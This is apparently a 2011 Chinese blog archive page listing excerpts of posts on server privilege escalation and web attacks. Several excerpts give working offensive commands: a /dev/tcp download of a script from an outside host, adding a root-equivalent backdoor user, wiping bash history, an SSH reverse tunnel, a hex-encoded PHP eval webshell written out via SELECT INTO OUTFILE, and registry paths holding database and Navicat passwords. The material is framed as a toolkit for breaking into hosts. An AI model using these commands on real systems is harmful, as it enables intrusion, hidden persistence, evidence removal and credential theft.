2011年3月24日

DB_OWNER或SA权限备份bat到启动项提权

摘要: 下面只给出关键的代码:使用查询分析器或者webshell连接上数据库后按如下步骤操作即可:1.DB权限列目录exec master..xp_dirtree 'c:\',1,1使用以上语句可以实现db权限下列出磁盘目录下面我们用备份的方式来备份一个BAT到启动项里----------------------------------------------------------------------------------------------------------------------------------------------------------------- 阅读全文

posted @ 2011-03-24 22:12 =_=! 阅读(368) 评论(0) 推荐(0) 编辑

对星外主机提权利用

摘要: T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外对新手来说在这里很容易陷入困境!星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位MD5加密很多情况下M 阅读全文

posted @ 2011-03-24 22:10 =_=! 阅读(1070) 评论(0) 推荐(0) 编辑

linux渗透小技巧

摘要: 1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 cnbird3.bash去掉history记录export HISTSIZE=0export HISTFILE=/dev/null4.SSH反向链接ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指 阅读全文

posted @ 2011-03-24 20:21 =_=! 阅读(368) 评论(0) 推荐(0) 编辑

SQL注入

摘要: 定义: SQL注入攻击(SQL injection,台湾称作SQL资料隐码攻击),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏。 有部份人认为SQL注入攻击是只针对Microsoft SQL Server而来,但只要是支持批次处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 优秀文章推荐: 维基百科上的SQL注入文章 >> http://en.wikipedia.org/wiki/SQL_injectio 阅读全文

posted @ 2011-03-24 01:43 =_=! 阅读(437) 评论(0) 推荐(0) 编辑

目录/路径遍历

摘要: 基本定义: 目录遍历(或路径遍历)(directory traversal/path traversal)是由于Web服务器或Web应用程序对用户输入文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过HTTP请求和利用一些特殊字符就可以绕过服务器的安全限制,访问任意受限的文件(可以是Web根目录以外的文件),甚至执行系统命令。可能导致路径遍历一些特殊字符:.. ..\ ../ %2e%2e%2f which translates to ../ %2e%2e/ which translates to ../ ..%2f which translates to ../ %2e%2e%5c 阅读全文

posted @ 2011-03-24 01:39 =_=! 阅读(1170) 评论(0) 推荐(0) 编辑

2011年3月21日

phpmyadmin\select into outfile导出webshell技巧

摘要: 在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quo 阅读全文

posted @ 2011-03-21 09:09 =_=! 阅读(560) 评论(0) 推荐(0) 编辑

navicat MySQL管理工具提权

摘要: navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到有两个方法提权:1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt2、navicat管理的MySQL服务器信息(一般是root帐户)是存在注册表里的,具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下,导出注册表导入到本机然后星号察看就OK了 阅读全文

posted @ 2011-03-21 08:57 =_=! 阅读(521) 评论(0) 推荐(0) 编辑

2011年3月19日

MySQL注入讲解

摘要: 在这Tutorail我将描述sql注入怎么运作和如何使用它获得一些有用的信息。首先:什么是SQL注入?它是一个与Web应用程序的最相同的弱点。它允许攻击者执行在URL的数据库询问和对一些机密信息等等能够存取(简而言之)。1.SQL注入(基于的经典之作或错误或什么您称它) :D2.盲目的SQL注入(更加坚固的部分)因此我们开始一些行动 :D1). 检查弱点假设我们有象这样的一些站点http://www.site.com/news.php?id=5现在测试,如果vulrnable我们补充说到URL的末端 '(行情) ,并且那是 http://www.site.com/news.php?id 阅读全文

posted @ 2011-03-19 06:51 =_=! 阅读(276) 评论(0) 推荐(1) 编辑

2011年3月18日

linux下mysql提权

摘要: linux提权,本文为您讲述一种linux提权方法,这是一种常见的linux提权技术..linux系统环境下,mysql以root权限登录时提权mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去, 阅读全文

posted @ 2011-03-18 12:03 =_=! 阅读(2249) 评论(0) 推荐(0) 编辑

2011年3月17日

linux 相关提权渗透技巧总结

该文被密码保护。 阅读全文

posted @ 2011-03-17 04:33 =_=! 阅读(2) 评论(0) 推荐(0) 编辑

导航